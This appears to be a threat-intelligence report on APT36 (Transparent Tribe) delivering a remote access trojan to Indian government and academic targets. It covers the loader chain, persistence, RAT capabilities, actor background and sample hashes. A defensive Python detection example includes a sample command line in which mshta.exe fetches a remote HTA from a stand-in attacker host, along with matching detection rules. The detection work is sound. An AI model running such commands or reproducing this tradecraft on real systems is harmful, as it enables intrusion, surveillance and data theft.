Verticals Targeted: Government, Academia
Regions Targeted: India
Related Families: None
Executive Summary
APT36, also known as Transparent Tribe, a Pakistan-aligned threat actor, has launched a targeted cyber espionage campaign against Indian governmental, academic, and strategic entities using sophisticated deception techniques. The operation delivers a multi-stage Remote Access Trojan (RAT) through a weaponized LNK file disguised as a PDF, enabling persistent access, surveillance, and data exfiltration with minimal detection risk.
Key Takeaways
- Transparent Tribe employed deceptive delivery via oversized LNK files embedding full PDF content to mimic legitimate documents and evade suspicion.
- They leveraged fileless execution, using mshta.exe to retrieve and run a remote HTA loader with layered decryption and in-memory payload reconstruction.
- The malware was equipped with adaptive persistence mechanisms to detect installed antivirus products and adjust techniques accordingly for long-term access.
- Comprehensive RAT capabilities include encrypted C2 communications, remote command execution, screenshot capture, clipboard manipulation, and targeted data theft.
The Activity
Researchers have observed a refined espionage operation from APT36 (Transparent Tribe), employing spear-phishing emails with ZIP archives containing malicious LNK files masquerading as examination-related PDF documents. Researchers at Cyfirma, who originally reported on this activity, did not designate a name for the malware used by Transparent Tribe in this campaign. For tracking and reporting purposes, PolySwarm analysts are referring to the malware associated with this campaign as ReadWriteRAT.
The LNK file used in the campaign, notably oversized due to embedded PDF structures and images, executes the legitimate Windows utility mshta.exe to fetch a remote HTA script from attacker-controlled infrastructure. This HTA loader conceals its window, implements custom Base64 decoding and XOR decryption, and manipulates the environment by setting .NET runtime variables via registry queries. The infection progresses through staged in-memory payloads. The initial "ReadOnly" component deserializes a .NET object using XAML-based configuration, abusing ObjectDataProvider to disable deserialization safeguards by altering internal .NET settings. This prepares the environment for the subsequent "WriteOnly" payload, a larger DLL loaded entirely in memory without disk artifacts.
The core malicious DLL establishes encrypted C2 channels over TCP to a hardcoded IP address, using AES encryption with a static key for data transmission. It profiles the system extensively, collecting details on operating system, username, installed software, and antivirus products via WMI queries. Persistence is dynamically tailored: for detected antivirus solutions, it deploys obfuscated HTA files or batch scripts in the Startup folder, invoked through PowerShell or cmd.exe; in other cases, it uses simplified shortcut placement or registry modifications.
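To show how a defender might surface the delivery and persistence behaviours described in the two paragraphs above (mshta.exe launched with a remote HTA URL, an oversized LNK carrying a document-style double extension, and script files dropped into the Startup folder), here is an added Python example written for this write-up. It is not code from the Cyfirma or PolySwarm analysis and is not derived from the malware; the Sysmon-style event dictionaries, the file paths, the attacker.example hostname and the 1 MB LNK size threshold are all constructed assumptions.

```python
import re

# Constructed Sysmon-style events (simplified dicts). Sample data only; none of
# these paths, hosts or sizes come from the report.
SAMPLE_EVENTS = [
    {"event": "process_create",
     "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\mshta.exe" http://attacker.example/loader.hta'},
    {"event": "process_create",
     "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\mshta.exe" C:\Program Files\Vendor\setup.hta'},
    {"event": "file_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.hta"},
    {"event": "file_create",
     "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\victim\Documents\notes.txt"},
    {"event": "file_create",
     "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\victim\Downloads\exam_schedule.pdf.lnk",
     "size": 3_500_000},
]

# mshta.exe fetching its script over HTTP(S) rather than from a local file.
REMOTE_URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Per-user Startup folder; matched case-insensitively against the full path.
STARTUP_DIR = "\\start menu\\programs\\startup\\"
# Script/shortcut types the report describes being placed in Startup.
SCRIPT_EXTS = (".hta", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".lnk")
# Assumption: benign shortcuts are a few KB; an LNK padded with a whole PDF is far larger.
LNK_SIZE_THRESHOLD = 1_000_000


def is_remote_mshta(event):
    """mshta.exe process whose command line points at an http(s) URL."""
    if event.get("event") != "process_create":
        return False
    image = event.get("image", "").lower()
    if not image.endswith("\\mshta.exe"):
        return False
    return REMOTE_URL_RE.search(event.get("command_line", "")) is not None


def is_startup_script_drop(event):
    """Script or shortcut written into a Startup folder (persistence)."""
    if event.get("event") != "file_create":
        return False
    target = event.get("target", "").lower()
    return STARTUP_DIR in target and target.endswith(SCRIPT_EXTS)


def is_masquerading_lnk(event):
    """LNK that mimics a document via a double extension or is abnormally large."""
    if event.get("event") != "file_create":
        return False
    target = event.get("target", "").lower()
    if not target.endswith(".lnk"):
        return False
    stem = target[:-len(".lnk")]
    double_ext = re.search(r"\.(pdf|docx?|xlsx?|pptx?)$", stem) is not None
    oversized = event.get("size", 0) >= LNK_SIZE_THRESHOLD
    return double_ext or oversized


RULES = {
    "remote_mshta": is_remote_mshta,
    "startup_script_drop": is_startup_script_drop,
    "masquerading_lnk": is_masquerading_lnk,
}


def triage(events):
    """Return (event_index, rule_name) pairs for every rule that fires."""
    hits = []
    for idx, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((idx, name))
    return hits


if __name__ == "__main__":
    for idx, name in triage(SAMPLE_EVENTS):
        print(f"[{name}] event #{idx}: {SAMPLE_EVENTS[idx]}")
```

Each rule is deliberately narrow so that false positives stay explainable: the local-HTA launch in the second event is not flagged, and an ordinary shortcut with a normal size and single extension passes. In practice these checks would be expressed in the SIEM or EDR query language, with the Startup-folder rule also watching the all-users Startup path and the Run registry keys the report mentions.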
The RAT provides extensive remote control features. It supports arbitrary shell command execution, file operations including enumeration, upload, download, and deletion, process listing and termination, and screenshot capture with resizing and JPEG compression for exfiltration. Surveillance extends to clipboard monitoring and manipulation, potentially enabling credential theft or cryptocurrency hijacking. Data theft routines recursively scan for sensitive files such as Office documents, PDFs, and databases, encoding and encrypting them prior to transmission.
To maintain deception, the malware deploys a decoy legitimate PDF upon execution, displaying it to the victim while background operations proceed. Additional threads monitor USB events for potential lateral movement. Overall, this campaign demonstrates APT36's advanced tradecraft in living-off-the-land techniques, environmental awareness, and modular design to sustain covert intelligence collection with reduced forensic footprints.
Who is Transparent Tribe?
Transparent Tribe, also known as APT36, ProjectM, Mythic Leopard, and COPPER FIELDSTONE, is a Pakistan-based APT group. The group has been active since at least 2013. Transparent Tribe primarily conducts cyber espionage operations.
The group uses spear-phishing emails with malicious attachments such as Office documents, PDFs, ZIP archives, or LNK files to deliver remote access trojans (RATs). They employ custom and modified malware including Crimson RAT, CapraRAT, ElizaRAT, DeskRAT, and Limepad to establish persistence, capture screenshots, log keystrokes, exfiltrate files, and execute remote commands. They leverage social engineering by exploiting geopolitical events, such as border tensions or terror attacks, to craft convincing lures. The threat actor impersonates legitimate Indian government portals through malvertising, domain squatting, and fake websites to harvest credentials and deploy payloads. They also target mobile devices with Android implants for call, message, and location monitoring.
Transparent Tribe is known to target Indian government organizations, military personnel, defense contractors, aerospace sectors, research centers, diplomats, and educational institutions. The group has a primary focus on India, with secondary targeting of Afghanistan and opportunistic attacks on entities in other countries including Sri Lanka, Nepal, the United States, the United Kingdom, and various European and Asian nations.
Transparent Tribe is widely attributed to Pakistani state interests, with assessments linking its operations to Pakistan's military or intelligence services, particularly the Inter-Services Intelligence (ISI). The group's targeting aligns with Pakistan's geopolitical objectives, especially regarding India-Pakistan relations, Kashmir, and regional strategic intelligence.
IOCs
PolySwarm has multiple samples associated with this activity.
06fb22c743fcc949998e280bd5deaf8f80d616b371576b5e11fd5b1d3b23a5f2
c1f3dea00caec58c9e0f990366ff40ae59e93f666f92e1c218c03478bf3abe17
fc43f4c618bce57461df5752a8d3bedf243eacfdd3e648ea8b1310083764fd92